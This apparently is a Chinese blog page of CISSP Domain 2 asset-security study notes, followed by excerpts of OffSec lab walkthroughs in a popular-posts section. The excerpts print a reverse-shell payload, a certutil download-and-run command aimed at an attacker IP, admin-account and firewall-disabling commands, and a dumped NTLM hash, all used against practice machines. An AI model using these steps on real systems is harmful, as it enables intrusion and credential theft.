CISSP EXAM Outline - Domain 2

-

Asset Security

資產安全


2.1 識別並分類信息和資產 Identify and classify information and assets

  • 數據分類 Data classification
    • 美國軍方資料分類等級
      • Top Secret 絕密
      • Secret 秘密
        • 可以識別或描述損害的數據
      • Confidential 機密
      • Unclassified 未分類無損害
    • 私人企業資料分類等級
      • Confidential/Proprietary 機密/專有
        • 一些組織在其計算機上指定特定的桌面背景
      • Private 私有
        • PII & PHI
      • Sensitive 敏感
        • 一般私人企業重複使用媒體對於敏感數據採用 Clearing
      • Public 公開
        • 例如企業網站  corporate websites
    • 數據被創建時標記(Label)數據有助於分類
    • 當數據的價值因法律、合規或業務原因而發生變化時,審查分類和重新分類數據是一種適當的應對措施
    • 數據分類的目的是為了確認其對於組織的價值
    • 對數據進行分類時要考慮數據的價值, 敏感性, 以及暴露的風險, 分類產生的成本不需要考慮
    • 電子郵件與附件必須用 AES 256 加密, TLS 不一定雙方有互相支援

  • 資產分類 Asset Classification
    • 盤點 Inventory
    • 分類 Classification
    • 保護 Protection



2.2 制定信息和資產處理要求 Establish information and asset handling requirements

  • 個資收集 : 
    • 告知目的
    • 取得同意
    • 收集最小化
    • 開放修改
    • 開放刪除
    • 出事要告知



2.3 安全配置資源  Provision resources securely

  • 信息和資產所有權 Information and asset ownership
    • 數據所有者(Data Owner)負責對信息系統進行分類並將安全控制選擇委託給系統所有者(System Owner),而保管人(custodians)則負責實施(implement)安全控制。
  • 資產列表(如有形、無形) Asset inventory (e.g., tangible, intangible)
    • 員工 (employees) 是一種有形 tangible 的資產 
  • 資產管理 Asset management
    • RFID 標籤是跟踪硬件資產和設備的常用解決方案。




2.4 管理數據生命週期  Manage data lifecycle

  • 數據角色(例如,所有者、控制者、保管員、處理員、用戶/對象)
  •  Data roles (i.e., owners, controllers, custodians, processors, users/subjects)
    • Data Subject(Users) 數據主體 : 信息所涉及的人。
    • Data Owner 數據所有者 : 收集/創建 PII 並負有法律責任(accountable)和義務保護它,對數據進行分類並教育他人如何通過傳播智慧財產文件、政策和監管要求、保管者(Custodian)應採取的具體保護措施來保護數據的實體 和合規性要求。通常是 CEO 或部門主管或總裁擔任此角色並對數據洩漏作為最終負責的人。
    • Data Controller 數據控制者 : 當真正的數據所有者不存在時,與數據所有者相同。
    • Data Processor 數據處理者 : 通常是在所有者/控制者的指導下工作的實體,例如 Third-party
    • Data Custodian 數據保管人執行日常任務以保護數據的完整性和安全性,其中包括備份數據, 監控數據。
    • Data Steward 數據管家 : 一個與數據用戶相關的新概念; 那些將數據用於商業目的的人。
    • Administrator 管理員 : 有權應用訪問和處理數據適當的訪問權限

  • 數據採集 (Data collection ) : 典型的數據生命週期, 收集(collection)是第一階段。
    • 個資收集 : 
      • 通知 : 告知個人收集和使用的目的
      • 取得同意
      • 安全 : 組織必須執行安全措施善盡保護個人數據
      • 收集最小化 : 不可收集未通知的數據與目的
      • 開放個人修改
      • 選擇 : 個人有權選擇退出與刪除(被遺忘權)
      • 出事要告知
    • sensitive data scanning tool :
      • 敏感數據掃描工具旨在使用已知格式和結構掃描和標記敏感數據類型。可以識別社會保險號、信用卡號和其他遵循已知規則的定期結構化數據,然後根據需要進行處理。
  • 數據位置 ( Data Location )
    • 靜止狀態
    • 使用狀態 (in memory), 安全最難處理
    • 傳輸狀態
  • 數據維護 ( Data maintenance )
    • 在典型數據生命週期的數據維護階段,會發生數據清理等活動,以刪除不需要、不正確或過時的數據。
  • 數據保留 ( Data retention )
    • 數據保留策略可以減少在法律案件期間可能需要生成的舊日誌和其他文件的數量。這可以降低組織風險,但保留政策需要在提交合法保留之前就位。減少使用中的存儲不會減少責任,但可以降低財務成本,並且數據保留策略不會限制使用中的分類數量。法律處罰不受保留政策的影響。
    • BlowFish : DES 的一種可能替代方案, Bcrypt 是基於 Blowfish 的, 用於 Linux 系統對密碼進行加密
  • 數據殘留 ( Data remanence ) 
    • 另一種說法為數據剩磁(Residual data)
  • 數據銷毀 ( Data Destruction )
    • SSD 不可用消磁技術, 僅適用摧毀, 分解技術, 若要重用採用加密所有數據是最佳做法
    • Erasing 擦除是最不安全的作法
    • Clearing 無法消除硬碟上的備用扇區, 或標記為壞的扇區
    • Purging 雖可安全清除數據與殘留物, 但美國政府不考慮, 絕密資料只有銷毀一途
    • Degaussing 消磁, 但對 CD/DVD/SSD 沒有作用
    • Destruction 銷毀, 最安全的介質淨化方法
    • Sanitization 消毒, 通常用於清除計算機系統
    • 典型的數據生命週期 : 收集是第一階段。一旦收集到,數據就可以在其使用壽命結束時進行分析、使用、存儲和處置
    • 另一個典型的生命週期 : 建立、儲存(分類)、使用、分享、封存、銷毀





2.5 確保適當的資產保留(例如,使用壽命結束 (EOL),支持結束 (EOS)) 

 Ensure appropriate asset retention (e.g., End-of-Life (EOL), End-of-Support (EOS))

  • EOS : 製造商或軟件提供商生命週期中的最後一個事件。
  • EOL 指不再銷售, 不代表不再支援該產品。
  • 包含有關數據生命週期和過期時間的信息的標籤有助於生命週期管理流程。




2.6 確定數據安全控制和合規要求 Determine data security controls and compliance requirements

  • 數據狀態(例如,使用中 in use、傳輸中 in motion/transit、靜止 in rest)
    • AES : 靜止的數據常用加密方式
    • TLS : 傳輸的數據常用加密方式
    • in transit 常見保護方式 : TLS, VPN, IPSEC
      • IPsec 包含 AH & ESP
        • AH 提供身分驗證和完整性
        • ESP 提供保密性
      • 管理遠端伺服器常用 SSH
  • 數據定界和定制 Scoping and Tailoring
    • Scoping : 檢查基準安全控制並僅選擇適用於您要保護的 IT 系統的那些控制, 刪除沒有用到的部分
    • Tailoring 是指在基準內修改安全控制列表,以使其與組織的任務保持一致。
  • 標準選擇 Standards selection
    • PHI 是受保護的健康信息。
      • PHI 是關於特定人的健康相關信息, PHI 必須受 HIPAA 保護
    • PII 個人身份信息是可以識別個人的任何信息。
      • NIST 特別出版物 800-122 將 PII (Personally identifiable information) 定義為可用於區分或追踪個人身份的任何信息,例如姓名、社會安全號碼、出生日期和地點、母親的婚前姓名、生物特徵記錄和其他相關信息或可鏈接到個人,例如教育、財務和就業信息。
  • 數據保護方法(例如,數字化權限管理 (DRM)、數據丟失防護 (DLP)、雲訪問安全代理 (CASB))
  • Data protection methods (e.g., Digital Rights Management (DRM), Data Loss Prevention (DLP),Cloud Access Security Broker (CASB)) 
    • DRM : Digital Rights Management
      • DRM 控制數位檔案的使用方式
    • DLP : Data Loss Prevention
      • 數據丟失防護 (DLP) 系統可以標記添加元(metadata)數據標籤、監控和限制文件傳輸到的位置
    • 企業主必須在提供價值的需求與監管、安全和其他要求之間取得平衡。這使得採用像 COBIT 這樣的通用框架幫助企業所有者很有吸引力。
    • Tokenization : 標記化/代幣化用隨機字符串替換其他數據。然後根據需要將這些令牌與安全查找的實際值匹配。
    • Anonymization : 匿名化會刪除所有可識別個人身份的數據,以確保無法識別原始主題。
    • Data masking : 數據屏蔽會掩蓋一些(但不是全部)數據。是一種匿名化的有效方法, 屏蔽後是不可逆轉的
    • Pseudonymization : 假名化使用假名或別名來代替其他信息。但可還原
    • CASB : Cloud Access Security Broker
      • CASB 旨在位於雲環境和使用它的用戶之間,它提供監控和策略執行功能。
    • CalOPPA 加州在線隱私保護法案, 美國最嚴格的法律之一




留言

張貼留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

-
圖片
Challenge 0 - Secura(2) 下一步就是先想辦法進入第二台 .96 Rustscan 看一下,看來這一台的梗在 3306 MySQL 上 測試了一下遠端 IP 被阻擋進入 MySQL 從已經打入的第一台 .95(SECURE) 搭建 chisel 去登入 .96 的 MySQL 看來也不行 先在第一台 .95 建立一個使用者 aries 與密碼 Oscp#1234 net user aries Oscp#1234 /add 加入到本機的 administrators 群組 net localgroup administrators aries /add 開啟 RDP reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 關掉 firewall netsh advfirewall set allprofiles state off RDP 進去開始枚舉,└─$ xfreerdp -v:192.168.204.95 -u:aries -p:'Oscp#1234' +clipboard -cert:ignore -drive:aries,/home/kali/lab0/95 網域簡名 SECURA 網域全名 secura.yzx 這一台有跑 PostgreSQL DB 跑在本機的 127.0.0.1 15432 Port 查找 *.kdbx & *.zip 發現 PostgreSQL 帳號密碼 postgres:appmanager 測試帳號密碼有效 甚麼都不能執行也找不到有用的資訊 暫時沒有方向,回到 .97 先枚舉使用者看看 ./kerbrute_linux_amd64 userenum --dc 192.168.204.97 -d secura.yzx -o kerbrute-user-enum xato-net-10-million-usernames.txt 獲得使用者帳號 michael、charlotte、secure、administrator、era 這幾個使用者都沒有 ASREP ./GetNPUsers....
閱讀完整內容

Challenge 0 - Secura(1)

-
圖片
 Challenge 0 - Secura(1) Offsec 在九月底的時候 LAB 推出了 Challenge 0,會取名 0 應該是相對簡單的,打打看吧 環境說明共三台機器,簡單掃了一下  - 95 : Web Server 感覺像是進入點  - 96 : DB 伺服器  - 97 : DC 95 8443 Port 打開是 AppManager14 版本是 14710 使用預設帳號密碼 admin:admin 可以直接登入 跑了一下 Metasploit 與 Exploit 針對 14700 的漏洞利用看來都沒有成功 5001 / 參考 Pentest Everything :  https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/windows/metallus 自己建立一個 payload,└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -b '\x00\x01\x0d' -f exe -o revershell.exe 接著在 Admin --> Upload Files / Binaries 頁面選擇 [ Upload Script to <Product_Home>/working ] 設定執行的檔案為 cmd.bat 建立一個 cmd.bat,內容如下 certutil.exe -f -urlcache -split http://192.168.45.179/lab0/95/revershell.exe c:\windows\temp\revershell.exe && cmd.exe /c c:\windows\temp\revershell.exe 上傳 cmd.bat 執行該 Script,成功拿到 Rever Shell whoami 看一下,進來就是 nt authority\system 直接拿 flag 跑一下 mimikatz.exe administrator NTLM HASH a51493b0b06e5e35f855245e71af1d14 測試看看 e...
閱讀完整內容

Challenge 8 - Poseidon(0)

-
圖片
 Challenge 8 - Poseidon(0) 最近真的新的 LAB 連發,又多了一個 Challenge 8 : Poseidon 剛好近期有空,開來看看吧,又是一個三台的組合,應該又是 AD 題組 跟前一個題組 zeus 很像,都是三台面向使用者沒有內網的機器 ping 看看,看來三台都是 Windows Rustscan 掃掃看,看來第一台一樣是 DC └─$ rustscan -a 192.168.163.161 --scripts none --ulimit 5000 | tee rustscan 第二台看來也像 DC └─$ rustscan -a 192.168.163.162 --scripts none --ulimit 5000 | tee rustscan 第三台,└─$ rustscan -a 192.168.163.162 --scripts none --ulimit 5000 | tee rustscan 第一台 161 nmap 資訊 Domain : poseidon.yzx,電腦名稱 dc01 NetBIOS_Domain_Name : poseidon 第二台 162 nmap 資訊 這一台看來是 Sub Domain 的 DC,FQDN: dc02.sub.poseidon.yzx NetBIOS_Domain_Name : sub 第三台 163 nmap 資訊 ldapsearch 161,ldapsearch -v -x -b "DC=poseidon,DC=yzx" -H "ldap://192.168.163.161" "(objectclass=*)" ldapsearch 162,ldapsearch -v -x -b "DC=sub,DC=poseidon,DC=yzx" -H "ldap://192.168.163.162" "(objectclass=*)" 預設 smbclient 列舉都爬不到東西 帶入 poseidon\guest & sub\guest SMB 也都爬不到資訊 爬看看 161 Domain 的使用者,└─$ ./kerbrute_linux_amd64...
閱讀完整內容